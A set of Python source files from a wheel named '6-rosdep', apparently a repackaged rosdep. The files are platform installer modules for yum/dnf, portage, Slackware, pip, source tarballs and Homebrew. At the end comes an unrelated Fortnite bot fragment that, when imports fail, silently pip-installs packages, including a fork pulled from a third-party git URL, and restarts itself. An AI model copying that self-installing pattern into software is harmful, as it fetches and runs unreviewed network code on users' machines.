context.add_os_installer_key(OS_FEDORA, YUM_INSTALLER)
context.add_os_installer_key(OS_FEDORA, SOURCE_INSTALLER)
context.set_default_os_installer_key(OS_FEDORA, lambda self: DNF_INSTALLER if self.get_version().isdigit() and int(self.get_version()) > 21 else YUM_INSTALLER)
context.set_os_version_type(OS_FEDORA, lambda self: self.get_version() if self.get_version().isdigit() and int(self.get_version()) > 20 else self.get_codename())
def register_rhel(context):
context.add_os_installer_key(OS_RHEL, PIP_INSTALLER)
context.add_os_installer_key(OS_RHEL, DNF_INSTALLER)
context.add_os_installer_key(OS_RHEL, YUM_INSTALLER)
context.add_os_installer_key(OS_RHEL, SOURCE_INSTALLER)
context.set_default_os_installer_key(OS_RHEL, lambda self: DNF_INSTALLER if self.get_version().split('.', 1)[0].isdigit() and int(self.get_version().split('.', 1)[0]) >= 8 else YUM_INSTALLER)
context.set_os_version_type(OS_RHEL, lambda self: self.get_version().split('.', 1)[0])
def register_rhel_clone(context, os_rhel_clone_name):
# Some distributions are rebuilds of RHEL and can be treated like RHEL
# because they are versioned the same and contain the same packages.
(os_name, os_version) = context.get_os_name_and_version()
if os_name == os_rhel_clone_name and not context.os_override:
print('rosdep detected OS: [%s] aliasing it to: [%s]' %
(os_rhel_clone_name, OS_RHEL), file=sys.stderr)
context.set_os_override(OS_RHEL, os_version.split('.', 1)[0])
def rpm_detect_py(packages):
ret_list = []
import rpm
ts = rpm.TransactionSet()
for raw_req in packages:
req = rpm_expand_py(raw_req)
rpms = ts.dbMatch(rpm.RPMTAG_PROVIDES, req)
if len(rpms) > 0:
ret_list += [raw_req]
return ret_list
def rpm_detect_cmd(raw_packages, exec_fn=None):
ret_list = []
if exec_fn is None:
exec_fn = read_stdout
packages = [rpm_expand_cmd(package, exec_fn) for package in raw_packages]
cmd = ['rpm', '-q', '--whatprovides', '--qf', '[%{PROVIDES}\n]']
cmd.extend(packages)
std_out = exec_fn(cmd)
out_lines = std_out.split('\n')
for index, package in enumerate(packages):
if package in out_lines:
ret_list.append(raw_packages[index])
return ret_list
def rpm_detect(packages, exec_fn=None):
try:
return rpm_detect_py(packages)
except ImportError:
rd_debug('Failed to import rpm module, falling back to slow method')
return rpm_detect_cmd(packages, exec_fn)
def rpm_expand_py(macro):
import rpm
if '%' not in macro:
return macro
expanded = rpm.expandMacro(macro)
rd_debug('Expanded rpm macro in \'%s\' to \'%s\'' % (macro, expanded))
return expanded
def rpm_expand_cmd(macro, exec_fn=None):
if '%' not in macro:
return macro
cmd = ['rpm', '-E', macro]
if exec_fn is None:
exec_fn = read_stdout
expanded = exec_fn(cmd).strip()
rd_debug('Expanded rpm macro in \'%s\' to \'%s\'' % (macro, expanded))
return expanded
def rpm_expand(package, exec_fn=None):
try:
return rpm_expand_py(package)
except ImportError:
return rpm_expand_cmd(package, exec_fn)
def get_rpm_version_py():
from rpm import __version__ as rpm_version
return rpm_version
def get_rpm_version_cmd():
output = subprocess.check_output(['rpm', '--version'])
version = output.splitlines()[0].split(b' ')[-1].decode()
return version
def get_rpm_version():
try:
return get_rpm_version_py()
except ImportError:
return get_rpm_version_cmd()
class DnfInstaller(PackageManagerInstaller):
"""
This class provides the functions for installing using dnf
it's methods partially implement the Rosdep OS api to complement
the roslib.OSDetect API.
"""
def __init__(self):
super(DnfInstaller, self).__init__(rpm_detect)
def get_version_strings(self):
dnf_output = subprocess.check_output(['dnf', '--version'])
dnf_version = dnf_output.splitlines()[0].decode()
version_strings = [
'dnf {}'.format(dnf_version),
'rpm {}'.format(get_rpm_version()),
]
return version_strings
def get_install_command(self, resolved, interactive=True, reinstall=False, quiet=False):
raw_packages = self.get_packages_to_install(resolved, reinstall=reinstall)
packages = [rpm_expand(package) for package in raw_packages]
if not packages:
return []
elif not interactive and quiet:
return [self.elevate_priv(['dnf', '--assumeyes', '--quiet', '--setopt=strict=0', 'install']) + packages]
elif quiet:
return [self.elevate_priv(['dnf', '--quiet', '--setopt=strict=0', 'install']) + packages]
elif not interactive:
return [self.elevate_priv(['dnf', '--assumeyes', '--setopt=strict=0', 'install']) + packages]
else:
return [self.elevate_priv(['dnf', '--setopt=strict=0', 'install']) + packages]
class YumInstaller(PackageManagerInstaller):
"""
This class provides the functions for installing using yum
it's methods partially implement the Rosdep OS api to complement
the roslib.OSDetect API.
"""
def __init__(self):
super(YumInstaller, self).__init__(rpm_detect)
def get_version_strings(self):
yum_output = subprocess.check_output(['yum', '--version'])
yum_version = yum_output.splitlines()[0].decode()
version_strings = [
'yum {}'.format(yum_version),
'rpm {}'.format(get_rpm_version()),
]
return version_strings
def get_install_command(self, resolved, interactive=True, reinstall=False, quiet=False):
raw_packages = self.get_packages_to_install(resolved, reinstall=reinstall)
packages = [rpm_expand(package) for package in raw_packages]
if not packages:
return []
elif not interactive and quiet:
return [self.elevate_priv(['yum', '--assumeyes', '--quiet', '--skip-broken', 'install']) + packages]
elif quiet:
return [self.elevate_priv(['yum', '--quiet', '--skip-broken', 'install']) + packages]
elif not interactive:
return [self.elevate_priv(['yum', '--assumeyes', '--skip-broken', 'install']) + packages]
else:
return [self.elevate_priv(['yum', '--skip-broken', 'install']) + packages] | 6-rosdep | /6_rosdep-0.1.0-py3-none-any.whl/fixed_rosdep/platforms/redhat.py | redhat.py |
# A word on atoms
# We'll be using 'atoms' instead of 'packages' for the majority of the gentoo installer.
# Atoms can specify a package version (either exactly, or min/max version), flags it has
# to be built with, and even repositories it has to come from
#
# Here are some valid atoms and their meanings:
# sed // A package named 'sed'
# sys-apps/sed // sed from the category 'sys-apps'. There can be collisions otherwise.
# sys-apps/sed::gentoo // sed from the category 'sys-apps' and the repository 'gentoo' (the default).
# >=sys-apps/sed-4 // sed of at least version 4
# sed[static,-nls] // sed built the static USE flag and withou the nls one
import os
from rospkg.os_detect import OS_GENTOO
from .source import SOURCE_INSTALLER
from ..installers import PackageManagerInstaller
from ..shell_utils import read_stdout
PORTAGE_INSTALLER = 'portage'
def register_installers(context):
context.set_installer(PORTAGE_INSTALLER, PortageInstaller())
def register_platforms(context):
context.add_os_installer_key(OS_GENTOO, PORTAGE_INSTALLER)
context.add_os_installer_key(OS_GENTOO, SOURCE_INSTALLER)
context.set_default_os_installer_key(OS_GENTOO, lambda self: PORTAGE_INSTALLER)
# Determine whether an atom is already satisfied
def portage_detect_single(atom, exec_fn=read_stdout):
"""
Check if a given atom is installed.
:param exec_fn: function to execute Popen and read stdout (for testing)
"""
std_out = exec_fn(['portageq', 'match', '/', atom])
# TODO consdier checking the name of the package returned
# Also, todo, figure out if just returning true if two packages are returned is cool..
return len(std_out) >= 1
def portage_detect(atoms, exec_fn=read_stdout):
"""
Given a list of atoms, return a list of which are already installed.
:param exec_fn: function to execute Popen and read stdout (for testing)
"""
# This is for testing, to make sure they're always checked in the same order
# TODO: make testing better to not need this
if isinstance(atoms, list):
atoms.sort()
return [a for a in atoms if portage_detect_single(a, exec_fn)]
# Check portage and needed tools for existence and compatibility
def portage_available():
if not os.path.exists('/usr/bin/portageq'):
return False
if not os.path.exists('/usr/bin/emerge'):
return False
# We only use standard, defined portage features.
# They work in all released versions of portage, and should work in
# future versionf for a long time to come.
# but .. TODO: Check versions
return True
class PortageInstaller(PackageManagerInstaller):
def __init__(self):
super(PortageInstaller, self).__init__(portage_detect)
def get_install_command(self, resolved, interactive=True, reinstall=False, quiet=False):
atoms = self.get_packages_to_install(resolved, reinstall=reinstall)
cmd = self.elevate_priv(['emerge'])
if not atoms:
return []
if interactive:
cmd.append('-a')
cmd.extend(atoms)
return [cmd] | 6-rosdep | /6_rosdep-0.1.0-py3-none-any.whl/fixed_rosdep/platforms/gentoo.py | gentoo.py |
# Author Nikolay Nikolov/[email protected]
import subprocess
import os
from ..core import InstallFailed
from .pip import PIP_INSTALLER
from ..installers import PackageManagerInstaller
from .source import SOURCE_INSTALLER
from ..shell_utils import read_stdout
SLACKWARE_OS_NAME = 'slackware'
SBOTOOLS_INSTALLER = 'sbotools'
SLACKPKG_INSTALLER = 'slackpkg'
def register_installers(context):
context.set_installer(SBOTOOLS_INSTALLER, SbotoolsInstaller())
context.set_installer(SLACKPKG_INSTALLER, SlackpkgInstaller())
def register_platforms(context):
context.add_os_installer_key(SLACKWARE_OS_NAME, SBOTOOLS_INSTALLER)
context.add_os_installer_key(SLACKWARE_OS_NAME, PIP_INSTALLER)
context.add_os_installer_key(SLACKWARE_OS_NAME, SOURCE_INSTALLER)
context.add_os_installer_key(SLACKWARE_OS_NAME, SLACKPKG_INSTALLER)
context.set_default_os_installer_key(SLACKWARE_OS_NAME, lambda self: SBOTOOLS_INSTALLER)
def sbotools_available():
if not os.path.exists('/usr/sbin/sboinstall'):
return False
return True
def sbotools_detect_single(p):
pkg_list = read_stdout(['ls', '/var/log/packages'])
p = subprocess.Popen(['grep', '-i', '^' + p], stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
p.communicate(pkg_list)
return not p.returncode
def sbotools_detect(packages):
return [p for p in packages if sbotools_detect_single(p)]
class SbotoolsInstaller(PackageManagerInstaller):
def __init__(self):
super(SbotoolsInstaller, self).__init__(sbotools_detect)
def get_install_command(self, resolved, interactive=True, reinstall=False, quiet=False):
if not sbotools_available():
raise InstallFailed((SBOTOOLS_INSTALLER, 'sbotools is not installed'))
packages = self.get_packages_to_install(resolved, reinstall=reinstall)
if not packages:
return []
cmd = ['sboinstall']
return [self.elevate_priv(cmd + [p] + ['-j']) for p in packages]
def slackpkg_available():
if not os.path.exists('/usr/sbin/slackpkg'):
return False
return True
def slackpkg_detect_single(p):
return not subprocess.call(['slackpkg', 'search', p], stdout=subprocess.PIPE, stderr=subprocess.PIPE)
def slackpkg_detect(packages):
return [p for p in packages if slackpkg_detect_single(p)]
class SlackpkgInstaller(PackageManagerInstaller):
def __init__(self):
super(SlackpkgInstaller, self).__init__(slackpkg_detect)
def get_install_command(self, resolved, interactive=True, reinstall=False, quiet=False):
# slackpkg does not provide non-interactive mode
packages = self.get_packages_to_install(resolved, reinstall=reinstall)
if not packages:
return []
else:
return [self.elevate_priv(['slackpkg', 'install', p]) for p in packages] | 6-rosdep | /6_rosdep-0.1.0-py3-none-any.whl/fixed_rosdep/platforms/slackware.py | slackware.py |
# Author Tully Foote/[email protected]
from __future__ import print_function
import os
import pkg_resources
import subprocess
import sys
from ..core import InstallFailed
from ..installers import PackageManagerInstaller
from ..shell_utils import read_stdout
# pip package manager key
PIP_INSTALLER = 'pip'
def register_installers(context):
context.set_installer(PIP_INSTALLER, PipInstaller())
def get_pip_command():
# First try pip2 or pip3
cmd = ['pip' + os.environ['ROS_PYTHON_VERSION']]
if is_cmd_available(cmd):
return cmd
# Second, try using the same python executable since we know that exists
if os.environ['ROS_PYTHON_VERSION'] == sys.version[0]:
try:
import pip
except ImportError:
pass
else:
return [sys.executable, '-m', 'pip']
# Finally, try python2 or python3 commands
cmd = ['python' + os.environ['ROS_PYTHON_VERSION'], '-m', 'pip']
if is_cmd_available(cmd):
return cmd
return None
def is_cmd_available(cmd):
try:
subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE).communicate()
return True
except OSError:
return False
def pip_detect(pkgs, exec_fn=None):
"""
Given a list of package, return the list of installed packages.
:param exec_fn: function to execute Popen and read stdout (for testing)
"""
pip_cmd = get_pip_command()
if not pip_cmd:
return []
fallback_to_pip_show = False
if exec_fn is None:
exec_fn = read_stdout
fallback_to_pip_show = True
pkg_list = exec_fn(pip_cmd + ['freeze']).split('\n')
ret_list = []
for pkg in pkg_list:
pkg_row = pkg.split('==')
if pkg_row[0] in pkgs:
ret_list.append(pkg_row[0])
# Try to detect with the return code of `pip show`.
# This can show the existance of things like `argparse` which
# otherwise do not show up.
# See:
# https://github.com/pypa/pip/issues/1570#issuecomment-71111030
if fallback_to_pip_show:
for pkg in [p for p in pkgs if p not in ret_list]:
# does not see retcode but stdout for old pip to check if installed
proc = subprocess.Popen(
pip_cmd + ['show', pkg],
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT
)
output, _ = proc.communicate()
output = output.strip()
if proc.returncode == 0 and output:
# `pip show` detected it, add it to the list.
ret_list.append(pkg)
return ret_list
class PipInstaller(PackageManagerInstaller):
"""
:class:`Installer` support for pip.
"""
def __init__(self):
super(PipInstaller, self).__init__(pip_detect, supports_depends=True)
def get_version_strings(self):
pip_version = pkg_resources.get_distribution('pip').version
setuptools_version = pkg_resources.get_distribution('setuptools').version
version_strings = [
'pip {}'.format(pip_version),
'setuptools {}'.format(setuptools_version),
]
return version_strings
def get_install_command(self, resolved, interactive=True, reinstall=False, quiet=False):
pip_cmd = get_pip_command()
if not pip_cmd:
raise InstallFailed((PIP_INSTALLER, 'pip is not installed'))
packages = self.get_packages_to_install(resolved, reinstall=reinstall)
if not packages:
return []
cmd = pip_cmd + ['install', '-U']
if quiet:
cmd.append('-q')
if reinstall:
cmd.append('-I')
return [self.elevate_priv(cmd + [p]) for p in packages] | 6-rosdep | /6_rosdep-0.1.0-py3-none-any.whl/fixed_rosdep/platforms/pip.py | pip.py |
# Author Tully Foote/[email protected]
from __future__ import print_function
import os
try:
from urllib.request import urlopen
from urllib.request import urlretrieve
from urllib.error import URLError
except ImportError:
from urllib2 import urlopen
from urllib import urlretrieve
from urllib2 import URLError
import hashlib
import yaml
from ..core import rd_debug, InvalidData
from ..installers import PackageManagerInstaller, InstallFailed
from ..shell_utils import create_tempfile_from_string_and_execute
SOURCE_INSTALLER = 'source'
def register_installers(context):
context.set_installer(SOURCE_INSTALLER, SourceInstaller())
class InvalidRdmanifest(Exception):
"""
rdmanifest format is invalid.
"""
pass
class DownloadFailed(Exception):
"""
File download failed either due to i/o issues or md5sum validation.
"""
pass
def _sub_fetch_file(url, md5sum=None):
"""
Sub-routine of _fetch_file
:raises: :exc:`DownloadFailed`
"""
contents = ''
try:
fh = urlopen(url)
contents = fh.read()
if md5sum is not None:
filehash = hashlib.md5(contents).hexdigest()
if md5sum and filehash != md5sum:
raise DownloadFailed("md5sum didn't match for %s. Expected %s got %s" % (url, md5sum, filehash))
except URLError as ex:
raise DownloadFailed(str(ex))
return contents
def get_file_hash(filename):
md5 = hashlib.md5()
with open(filename, 'rb') as f:
for chunk in iter(lambda: f.read(8192), b''):
md5.update(chunk)
return md5.hexdigest()
def fetch_file(url, md5sum=None):
"""
Download file. Optionally validate with md5sum
:param url: URL to download
:param md5sum: Expected MD5 sum of contents
"""
error = contents = ''
try:
contents = _sub_fetch_file(url, md5sum)
if not isinstance(contents, str):
contents = contents.decode('utf-8')
except DownloadFailed as e:
rd_debug('Download of file %s failed' % (url))
error = str(e)
return contents, error
def load_rdmanifest(contents):
"""
:raises: :exc:`InvalidRdmanifest`
"""
try:
return yaml.safe_load(contents)
except yaml.scanner.ScannerError as ex:
raise InvalidRdmanifest('Failed to parse yaml in %s: Error: %s' % (contents, ex))
def download_rdmanifest(url, md5sum, alt_url=None):
"""
:param url: URL to download rdmanifest from
:param md5sum: MD5 sum for validating url download, or None
:returns: (contents of rdmanifest, download_url). download_url is
either *url* or *alt_url* and indicates which of the locations
contents was generated from.
:raises: :exc:`DownloadFailed`
:raises: :exc:`InvalidRdmanifest`
"""
# fetch the manifest
download_url = url
error_prefix = 'Failed to load a rdmanifest from %s: ' % (url)
contents, error = fetch_file(download_url, md5sum)
# - try the backup url
if not contents and alt_url:
error_prefix = 'Failed to load a rdmanifest from either %s or %s: ' % (url, alt_url)
download_url = alt_url
contents, error = fetch_file(download_url, md5sum)
if not contents:
raise DownloadFailed(error_prefix + error)
manifest = load_rdmanifest(contents)
return manifest, download_url
# TODO: create SourceInstall instance objects
class SourceInstall(object):
def __init__(self):
self.manifest = self.manifest_url = None
self.install_command = self.check_presence_command = None
self.exec_path = None
self.tarball = self.alternate_tarball = None
self.tarball_md5sum = None
self.dependencies = None
@staticmethod
def from_manifest(manifest, manifest_url):
r = SourceInstall()
r.manifest = manifest
r.manifest_url = manifest_url
rd_debug('Loading manifest:\n{{{%s\n}}}\n' % manifest)
r.install_command = manifest.get('install-script', '')
r.check_presence_command = manifest.get('check-presence-script', '')
r.exec_path = manifest.get('exec-path', '.')
try:
r.tarball = manifest['uri']
except KeyError:
raise InvalidRdmanifest('uri required for source rosdeps')
r.alternate_tarball = manifest.get('alternate-uri')
r.tarball_md5sum = manifest.get('md5sum')
r.dependencies = manifest.get('depends', [])
return r
def __str__(self):
return 'source: %s' % (self.manifest_url)
__repr__ = __str__
def is_source_installed(source_item, exec_fn=None):
return create_tempfile_from_string_and_execute(source_item.check_presence_command, exec_fn=exec_fn)
def source_detect(pkgs, exec_fn=None):
return [x for x in pkgs if is_source_installed(x, exec_fn=exec_fn)]
class SourceInstaller(PackageManagerInstaller):
def __init__(self):
super(SourceInstaller, self).__init__(source_detect, supports_depends=True)
self._rdmanifest_cache = {}
def resolve(self, rosdep_args):
"""
:raises: :exc:`InvalidData` If format invalid or unable
to retrieve rdmanifests.
:returns: [SourceInstall] instances.
"""
try:
url = rosdep_args['uri']
except KeyError:
raise InvalidData("'uri' key required for source rosdeps")
alt_url = rosdep_args.get('alternate-uri', None)
md5sum = rosdep_args.get('md5sum', None)
# load manifest from cache or from web
manifest = None
if url in self._rdmanifest_cache:
return self._rdmanifest_cache[url]
elif alt_url in self._rdmanifest_cache:
return self._rdmanifest_cache[alt_url]
try:
rd_debug('Downloading manifest [%s], mirror [%s]' % (url, alt_url))
manifest, download_url = download_rdmanifest(url, md5sum, alt_url)
resolved = SourceInstall.from_manifest(manifest, download_url)
self._rdmanifest_cache[download_url] = [resolved]
return [resolved]
except DownloadFailed as ex:
# not sure this should be masked this way
raise InvalidData(str(ex))
except InvalidRdmanifest as ex:
raise InvalidData(str(ex))
def get_install_command(self, resolved, interactive=True, reinstall=False, quiet=False):
# Instead of attempting to describe the source-install steps
# inside of the rosdep command chain, we shell out to an
# external rosdep-source command. This separation means that
# users can manually invoke rosdep-source and also keeps
# 'get_install_command()' cleaner.
packages = self.get_packages_to_install(resolved, reinstall=reinstall)
commands = []
for p in packages:
commands.append(['rosdep-source', 'install', p.manifest_url])
return commands
def get_depends(self, rosdep_args):
deps = rosdep_args.get('depends', [])
for r in self.resolve(rosdep_args):
deps.extend(r.dependencies)
return deps
def install_from_file(rdmanifest_file):
with open(rdmanifest_file, 'r') as f:
contents = f.read()
manifest = load_rdmanifest(contents)
install_source(SourceInstall.from_manifest(manifest, rdmanifest_file))
def install_from_url(rdmanifest_url):
manifest, download_url = download_rdmanifest(rdmanifest_url, None, None)
install_source(SourceInstall.from_manifest(manifest, download_url))
def install_source(resolved):
import shutil
import tarfile
import tempfile
tempdir = tempfile.mkdtemp()
rd_debug('created tmpdir [%s]' % (tempdir))
rd_debug('Fetching tarball %s' % resolved.tarball)
# compute desired download path
filename = os.path.join(tempdir, os.path.basename(resolved.tarball))
f = urlretrieve(resolved.tarball, filename)
assert f[0] == filename
if resolved.tarball_md5sum:
rd_debug('checking md5sum on tarball')
hash1 = get_file_hash(filename)
if resolved.tarball_md5sum != hash1:
# try backup tarball if it is defined
if resolved.alternate_tarball:
f = urlretrieve(resolved.alternate_tarball)
filename = f[0]
hash2 = get_file_hash(filename)
if resolved.tarball_md5sum != hash2:
failure = (SOURCE_INSTALLER, 'md5sum check on %s and %s failed. Expected %s got %s and %s' % (resolved.tarball, resolved.alternate_tarball, resolved.tarball_md5sum, hash1, hash2))
raise InstallFailed(failure=failure)
else:
raise InstallFailed((SOURCE_INSTALLER, 'md5sum check on %s failed. Expected %s got %s ' % (resolved.tarball, resolved.tarball_md5sum, hash1)))
else:
rd_debug('No md5sum defined for tarball, not checking.')
try:
# This is a bit hacky. Basically, don't unpack dmg files as
# we are currently using source rosdeps for Nvidia Cg.
if not filename.endswith('.dmg'):
rd_debug('Extracting tarball')
tarf = tarfile.open(filename)
tarf.extractall(tempdir)
else:
rd_debug('Bypassing tarball extraction as it is a dmg')
rd_debug('Running installation script')
success = create_tempfile_from_string_and_execute(resolved.install_command, os.path.join(tempdir, resolved.exec_path))
if success:
rd_debug('successfully executed script')
else:
raise InstallFailed((SOURCE_INSTALLER, 'installation script returned with error code'))
finally:
rd_debug('cleaning up tmpdir [%s]' % (tempdir))
shutil.rmtree(tempdir) | 6-rosdep | /6_rosdep-0.1.0-py3-none-any.whl/fixed_rosdep/platforms/source.py | source.py |
# Author Tully Foote/[email protected], Ken Conley
import subprocess
import json
import sys
import traceback
from rospkg.os_detect import OS_OSX, OsDetect
from ..core import InstallFailed, RosdepInternalError, InvalidData
from .pip import PIP_INSTALLER
from .source import SOURCE_INSTALLER
from ..installers import PackageManagerInstaller
from ..shell_utils import read_stdout
# add additional os names for brew, macports (TODO)
OSXBREW_OS_NAME = 'osxbrew'
BREW_INSTALLER = 'homebrew'
MACPORTS_INSTALLER = 'macports'
# py3k
try:
_basestring = basestring
except NameError:
_basestring = str
def register_installers(context):
context.set_installer(MACPORTS_INSTALLER, MacportsInstaller())
context.set_installer(BREW_INSTALLER, HomebrewInstaller())
def register_platforms(context):
context.add_os_installer_key(OS_OSX, BREW_INSTALLER)
context.add_os_installer_key(OS_OSX, MACPORTS_INSTALLER)
context.add_os_installer_key(OS_OSX, PIP_INSTALLER)
context.add_os_installer_key(OS_OSX, SOURCE_INSTALLER)
context.set_default_os_installer_key(OS_OSX, lambda self: BREW_INSTALLER)
context.set_os_version_type(OS_OSX, OsDetect.get_codename)
def is_port_installed():
try:
subprocess.Popen(['port'], stdout=subprocess.PIPE, stderr=subprocess.PIPE).communicate()
return True
except OSError:
return False
def port_detect(pkgs, exec_fn=None):
ret_list = []
if not is_port_installed():
return ret_list
if exec_fn is None:
exec_fn = read_stdout
std_out = exec_fn(['port', 'installed'] + pkgs)
for pkg in std_out.split('\n'):
pkg_row = pkg.split()
if len(pkg_row) == 3 and pkg_row[0] in pkgs and pkg_row[2] == '(active)':
ret_list.append(pkg_row[0])
return ret_list
class MacportsInstaller(PackageManagerInstaller):
"""
An implementation of the :class:`Installer` API for use on
macports systems.
"""
def __init__(self):
super(MacportsInstaller, self).__init__(port_detect)
def get_version_strings(self):
try:
p = subprocess.Popen(
['port', 'version'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
stdout, stderr = p.communicate()
version = stdout.replace('Version: ', '')
return ['Macports {}'.format(version.strip())]
except OSError:
return ['Macports not-found']
def get_install_command(self, resolved, interactive=True, reinstall=False):
if not is_port_installed():
raise InstallFailed((MACPORTS_INSTALLER, 'MacPorts is not installed'))
packages = self.get_packages_to_install(resolved)
if not packages:
return []
else:
# TODO: interactive
return [self.elevate_priv(['port', 'install', p]) for p in packages]
def is_brew_installed():
try:
subprocess.Popen(['brew'], stdout=subprocess.PIPE, stderr=subprocess.PIPE).communicate()
return True
except OSError:
return False
class HomebrewResolution(object):
"""Resolution information for a single package of a Homebrew rosdep."""
def __init__(self, package, install_flags, options):
"""
:param package: Homebrew package name, possibly fully qualified
with tap.
:param install_flags: List of strings of additional flags for
``brew install`` and ``brew deps`` command which are not
options (e.g. ``--HEAD``)
:param options: List of strings of options for the homebrew
package.
"""
self.package = package
self.install_flags = install_flags
self.options = options
def __eq__(self, other):
return other.package == self.package and \
other.install_flags == self.install_flags and \
other.options == self.options
def __hash__(self):
return hash((
type(self),
self.package,
tuple(self.install_flags),
tuple(self.options)))
def __str__(self):
return ' '.join(self.to_list())
def to_list(self):
return [self.package] + self.install_flags + self.options
def brew_strip_pkg_name(package):
"""Strip the tap information of a fully qualified package name.
:returns: Unqualified package name. E.g. 'foo-pkg' for input
'ros/hydro/foo-pkg'
"""
if not isinstance(package, str): # package is a bytes object
package = package.decode()
return package.split('/')[-1]
def brew_detect(resolved, exec_fn=None):
"""Given a list of resolutions, return the list of installed resolutions.
:param resolved: List of HomebrewResolution objects
:returns: Filtered list of HomebrewResolution objects
"""
if exec_fn is None:
exec_fn = read_stdout
std_out = exec_fn(['brew', 'list'])
installed_formulae = std_out.split()
def is_installed(r):
# TODO: Does not check installed version (stable, devel, HEAD)
# TODO: Does not check origin (Tap) of formula
# TODO: Does not handle excluding options (e.g. specifying
# --without-foo for --with-foo option)
# fast fail with a quick check first, then slower check if
# really linked and for options
if not brew_strip_pkg_name(r.package) in installed_formulae:
return False
std_out = exec_fn(['brew', 'info', r.package, '--json=v1'])
try:
pkg_info = json.loads(std_out)
pkg_info = pkg_info[0]
linked_version = pkg_info['linked_keg']
if not linked_version:
return False
for spec in pkg_info['installed']:
if spec['version'] == linked_version:
installed_options = spec['used_options']
break
except (ValueError, TypeError):
e_type, e, tb = sys.exc_info()
raise RosdepInternalError(
e, """Error while parsing brew info for '{0}'
* Output of `brew info {0} --json=v1`:
{1}
* Error while parsing:
{2}""".format(r.package, std_out, ''.join(traceback.format_exception(e_type, e, tb))))
if set(r.options) <= set(installed_options):
return True
else:
return False
# preserve order
return list(filter(is_installed, resolved))
class HomebrewInstaller(PackageManagerInstaller):
"""
An implementation of Installer for use on homebrew systems.
Some examples for supported rosdep specifications:
# Example 1: flat list of options if only one package defined.
foo:
osx:
homebrew:
depends: [bar]
options: [--with-quux, --with-quax]
packages: [foo-pkg]
# Example 2: list of list of options for multiple packages
bar:
osx:
homebrew:
options: [[], [--with-quux]]
packages: [bar-pkg, bar-pkg-dev]
# Example 3: list of options can be shorter than list of packages (filling
# up with empty options)
baz:
osx:
homebrew:
options: [[--with-quax]]
packages: [baz-pkg, baz-pkg-dev]
# Example 4: No options is fine.
buz:
osx:
homebrew:
packages: [buz-pkg]
``install_flags`` are handled analogously to ``options``.
"""
def __init__(self):
super(HomebrewInstaller, self).__init__(brew_detect, supports_depends=True)
self.as_root = False
def get_version_strings(self):
try:
p = subprocess.Popen(
['brew', '--version'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
stdout, stderr = p.communicate()
return stdout.splitlines()
except OSError:
return ['Homebrew not-found']
def resolve(self, rosdep_args):
"""
See :meth:`Installer.resolve()`
"""
def coerce_to_list(options):
if isinstance(options, list):
return options
elif isinstance(options, _basestring):
return options.split()
else:
raise InvalidData("Expected list or string for options '%s'" % options)
def handle_options(options):
# if only one package is specified we allow a flat list of options
if len(packages) == 1 and options and not isinstance(options[0], list):
options = [options]
else:
options = list(map(coerce_to_list, options))
# make sure options is a list of list of strings
try:
valid = all([isinstance(x, _basestring) for option in options for x in option])
except Exception as e:
raise InvalidData("Invalid list of options '%s', error: %s" % (options, e))
else:
if not valid:
raise InvalidData("Invalid list of options '%s'" % options)
# allow only fewer or equal number of option lists
if len(options) > len(packages):
raise InvalidData("More options '%s' than packages '%s'" % (options, packages))
else:
options.extend([[]] * (len(packages) - len(options)))
return options
packages = super(HomebrewInstaller, self).resolve(rosdep_args)
resolution = []
if packages:
options = []
install_flags = []
if type(rosdep_args) == dict:
options = coerce_to_list(rosdep_args.get('options', []))
install_flags = coerce_to_list(rosdep_args.get('install_flags', []))
options = handle_options(options)
install_flags = handle_options(install_flags)
# packages, options and install_flags now have the same length
resolution = map(HomebrewResolution, packages, install_flags, options)
return resolution
def get_install_command(self, resolved, interactive=True, reinstall=False, quiet=False):
# TODO: We should somehow inform the user that we uninstall all versions
# of packages and do not keep track of which options have been
# activated. Then again, maybe not this would be the
# responsibility of the user to before or not use --reinstall.
if not is_brew_installed():
raise InstallFailed((BREW_INSTALLER, 'Homebrew is not installed'))
resolved = self.get_packages_to_install(resolved, reinstall=reinstall)
resolved = self.remove_duplicate_dependencies(resolved)
# interactive switch doesn't matter
if reinstall:
commands = []
for r in resolved:
# --force uninstalls all versions of that package
commands.append(self.elevate_priv(['brew', 'uninstall', '--force', r.package]))
commands.append(self.elevate_priv(['brew', 'install'] + r.to_list()))
return commands
else:
return [self.elevate_priv(['brew', 'install'] + r.to_list()) for r in resolved]
def remove_duplicate_dependencies(self, resolved):
# TODO: we do not look at options here, however the install check later
# will inform use if installed options are not appropriate
# TODO: we comapre unqualified package names, ignoring the specifed tap
if not is_brew_installed():
raise InstallFailed((BREW_INSTALLER, 'Homebrew is not installed'))
# we'll remove dependencies from this copy and return it
resolved_copy = list(resolved)
# find all dependencies for each package
for r in resolved:
sub_command = ['brew', 'deps'] + r.to_list()
output = subprocess.Popen(sub_command, stdout=subprocess.PIPE).communicate()[0]
deps = output.split()
for d in deps:
# remove duplicate dependency from package list
for other in resolved_copy:
if brew_strip_pkg_name(other.package) == brew_strip_pkg_name(d):
resolved_copy.remove(other)
return resolved_copy | 6-rosdep | /6_rosdep-0.1.0-py3-none-any.whl/fixed_rosdep/platforms/osx.py | osx.py |
from platform import platform
try:
# System imports.
from typing import Tuple, Any, Union, Optional
import asyncio
import sys
import datetime
import json
import functools
import os
import random as py_random
import logging
import uuid
import json
import subprocess
import fortnitepy
# Third party imports.
from fortnitepy.ext import commands
from colorama import Fore, Back, Style, init
init(autoreset=True)
from functools import partial
import crayons
import PirxcyPinger
import FortniteAPIAsync
import sanic
import aiohttp
import requests
except ModuleNotFoundError as e:
print(f'Error: {e}\nAttempting to install packages now (this may take a while).')
for module in (
'crayons',
'PirxcyPinger',
'FortniteAPIAsync',
'sanic==21.6.2',
'aiohttp',
'requests',
'git+git://github.com/lkxoayh/fortnitepy.git'
):
subprocess.check_call([sys.executable, "-m", "pip", "install", module])
os.system('clear')
print('Installed packages, restarting script.')
python = sys.executable
os.execl(python, python, *sys.argv)
print(crayons.blue(f'schbots made by Aeroz. credit to Terbau for creating the library.'))
print(crayons.blue(f'Discord server: https://discord.gg/lobbybot - For support, questions, etc.'))
sanic_app = sanic.Sanic(__name__)
server = None
cid = ""
name = ""
friendlist = ""
password = None
copied_player = ""
__version__ = "None"
adminsss = 'AerozOff'
headers = {'Accept': '*/*'}
